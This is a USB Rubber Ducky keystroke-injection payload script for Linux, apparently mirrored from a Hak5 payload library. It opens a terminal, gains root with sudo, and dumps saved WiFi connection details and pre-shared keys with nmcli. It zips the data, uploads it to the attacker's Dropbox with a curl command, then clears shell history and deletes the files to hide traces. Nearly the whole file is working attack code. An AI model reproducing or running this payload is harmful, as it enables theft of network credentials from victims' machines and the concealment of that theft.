Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
3020 views
1


2
REM #######################################################

3
REM #                                                     |

4
REM # Title        : Exfiltrate Wifi Passwords - Linux    |

5
REM # Author       : Aleff                                |

6
REM # Version      : 1.0                                  |

7
REM # Category     : Exfiltration, Credentials, Execution |

8
REM # Target       : Linux                                |

9
REM #                                                     |

10
REM #######################################################

11


12
REM Requirements:

13
REM     - Permissions

14
REM     - Internet connection

15
REM     - Dropbox Token

16


17
DELAY 1000

18
CTRL-ALT t

19
DELAY 2000

20


21


22
REM #### PREREQUISITES SECTION ####

23


24


25
REM Required: You need to know the sudo password and replace 'example' with this

26
DEFINE SUDO_PASS example

27
STRING sudo su

28
ENTER

29


30
DELAY 1000

31
STRING SUDO_PASS

32
ENTER

33


34
DELAY 2000

35
REM Required: Set here your Dropbox access TOKEN

36
DEFINE TOKEN example

37
STRING ACCESS_TOKEN="

38
STRING TOKEN

39
STRING "

40
ENTER

41


42


43
REM #### ZIP SECTION ####

44


45


46
DELAY 500

47
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)

48
ENTER

49


50
DELAY 500

51
STRING ZIP_NAME="$RANDOM.zip"

52
ENTER

53


54
DELAY 500

55
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home" prefix-XXXXXXXXXX)

56
ENTER

57


58
DELAY 500

59
STRING ZIP_PATH="/home/$ZIP_NAME"

60
ENTER

61


62


63
REM #### WiFi && ZIP SECTION ####

64


65


66
REM Get all WiFi data

67
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do

68
ENTER

69
DELAY 500

70
STRING     nmcli connection show $conn >> "$TMP_FOLDER_PATH/output_verbose.txt" -

71
ENTER

72
DELAY 500

73
STRING     nmcli connection show $conn | grep psk >> "$TMP_FOLDER_PATH/output.txt" -

74
ENTER

75
DELAY 500

76
STRING done

77
ENTER

78
DELAY 500

79
REM Wifi exfiltration command time - It depends

80
DELAY 1000

81


82
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"

83
REM Zip operation time - It depends

84
DELAY 3000

85


86


87
REM #### EXFILTRATE SECTION ####

88


89


90
REM Set yout Dropbox folder name

91
DEFINE DROPBOX_FOLDER_NAME example

92
STRING DROPBOX_FOLDER="/

93
ENTER

94
STRING DROPBOX_FOLDER_NAME

95
ENTER

96
STRING "

97
ENTER

98
DELAY 500

99


100
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload

101
STRING curl -X POST

102
STRING DROPBOX_API_CONST

103
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"

104
ENTER

105


106


107
REM #### REMOVE TRACES ####

108


109


110
DELAY 2000

111
STRING history -c

112
ENTER

113


114
DELAY 500

115
STRING rm -rf "$TMP_FOLDER_PATH"

116
ENTER

117


118
DELAY 500

119
STRING rm -rf "$ZIP_PATH"

120
ENTER

121


122
DELAY 500

123
STRING exit

124
ENTER

125


126
DELAY 500

127
STRING exit

128
ENTER

129


130